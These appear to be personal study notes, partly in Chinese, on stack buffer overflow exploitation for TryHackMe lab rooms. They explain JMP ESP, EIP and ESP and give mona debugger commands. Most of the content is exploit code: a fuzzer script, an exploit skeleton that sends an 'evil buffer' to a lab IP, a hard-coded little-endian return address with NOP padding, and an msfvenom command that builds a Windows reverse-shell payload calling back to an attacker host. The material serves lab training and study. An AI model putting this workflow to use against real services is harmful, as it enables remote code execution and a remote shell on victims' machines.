Buffer Overflows

[WDavid404]

https://tryhackme.com/room/bof1 https://tryhackme.com/room/bufferoverflowprep

[WDavid404]

Why is JMP ESP required in buffer overflow?

we have our shellcode on the stack, and we need to move to that address without specifying the shellcode hardcoded address directly. We can use the JMP instruction, to jump to the stack, and stack top is pointed to by the ESP register.

we overwrite the return address with the address of this “JMP ESP” instruction, and when the return address executes this instruction, it will return to the stack.

EIP, ESP

EIP is the instruction pointer. It points to (holds the address of) the first byte of the next instruction to be executed. ESP is the stack pointer. It points to (holds the address of) the most-recently pushed value on the stack.

[WDavid404]

Tools:

• Immunity Debugger

• • mona configuration:!mona config -set workingfolder c:\mona\%p

• Find offset -- /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 700 -- !mona findmsp -distance 700

• • 

• Find bad characters: -- generate bytearray

  for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
  print()

  -- !mona bytearray -b "\x00" --!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>

• Find jmp esp command: -- !mona jmp -r esp -cpb "\x00\x07\x2e\xa0" (bad characters)

  

--》 the address 625011AF Update our retn variable with the new address and must be written backward (since the system is little-endian=Reverse).

retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16

• Make payload without bad characters -- msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00{bad characters}" -f python
• 在payload的前面加上NOP padding = "\x90" * 16

Lession:

Note：不要一下子发送太长的byte的payload： 比如OVERFlow2，在700bytes时就能发生问题（EIP变成AAAA），但是如果发送5000个bytes的payload，EIP则不会是AAAA

[WDavid404]

fuzzy.py

ip = "10.10.198.14"
port = 1337

prefix = "OVERFLOW3 "
offset = 1000
overflow = "A" * offset
retn = ""
padding = "\x90" * 16
payload=""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

[WDavid404]

explorer.py

#!/usr/bin/env python3

import socket, time, sys

ip = "10.10.198.14"

port = 1337
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

[WDavid404]

generate bytearray: all_chars.py

for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
print()

[WDavid404]

Good video: https://www.youtube.com/watch?v=skvjS4OX8cg